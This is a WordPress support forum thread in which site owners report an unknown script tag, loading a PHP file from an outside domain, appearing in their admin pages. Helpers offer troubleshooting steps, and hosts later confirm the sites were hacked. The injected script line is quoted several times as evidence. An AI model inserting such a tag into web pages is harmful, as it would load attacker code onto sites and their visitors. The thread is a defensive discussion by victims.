Support » How-To and Troubleshooting » I did the updrage to the latest version now I have some strange code.

I did the updrage to the latest version now I have some strange code.

  • I just upgraded to the newest version of wordpress and on my pages I am seeing this code…..

    <script src=”http://infoitpoweringgathering.com/ll.php?kk=11″></script>

    any idea what this is and what it effects or how to get rid of it?

Viewing 15 replies - 1 through 15 (of 79 total)
  • Try switching to the default theme and deactivating all plugins. What is the URL of the site? If I go to http://infoitpoweringgathering.com/ I get a blank page.



    Forum Moderator

    Have you tried:

    – deactivating all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    – switching to the Twenty Ten theme to rule out any theme-specific problems.

    resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

    The url for my site is http://www.forgednc.com the code doesn’t show up on the site but in the backend when I view the site.

    I get a blank page when I go to http://infoitpoweringgathering.com/ as well that is why I can’t tell wtf it is.

    Not sure how to reset the plugins. But can try the deactivating.

    If you have a good code editing program with “advanced search” you can download all of the files from your site and find out which one has that link to infoitpoweringgathering.com in it. You have a custom theme, so is that some reference to your theme developer? Try the things esmi suggested. “resetting the plugins folder” can be done by renaming the old one and creating a new one via FTP.

    I have the same thing … I go to my dashboard and see <script src=”http://infoitpoweringgathering.com/ll.php?kk=11″></script> in the quickpress section in the contents area. I can’t delete it for anything, trying to find out what it is, how to get rid of it, seeing if my host knows anything or can help…

    I have no idea what i’m doing… Or what that is?! I didn’t upload or install anything new lately, and that infoitpoweringgathering.com has nothing to do with my site, developer or host…

    Your sites may have been hacked. Are you running a firewall?


    I’m not really sure why they released Firewall2 as a new plugin rather than as a new version of the original plugin, but there it is.

    Thanks Jonas, I didn’t have one installed but I do now… Now just to figure out WTF is going on with this script code and how to get rid of it!

    Interesting… Installed that firewall now the script code is gone…

    You’re welcome.

    HA! Just an update, it was a coincidence that the firewall did anything, just heard from my host and I was hacked – virus attack they said.. To the OP contact your host!

    I just installed the firewall and the script is still there. Ok so I will try to contact my host to see if it is a virus. Is there a virus remover for a website?

    No idea… My host fixed the issue… just out of curiosity, who’s your host Jason? Mine is ipower

    I am on ipower as well. Did you contact them or did they contact you?

    I contacted them..

Viewing 15 replies - 1 through 15 (of 79 total)
  • The topic ‘I did the updrage to the latest version now I have some strange code.’ is closed to new replies.